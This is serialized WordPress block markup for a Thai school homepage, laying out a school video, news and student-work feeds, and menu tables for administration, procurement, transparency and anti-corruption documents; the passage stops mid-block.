wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%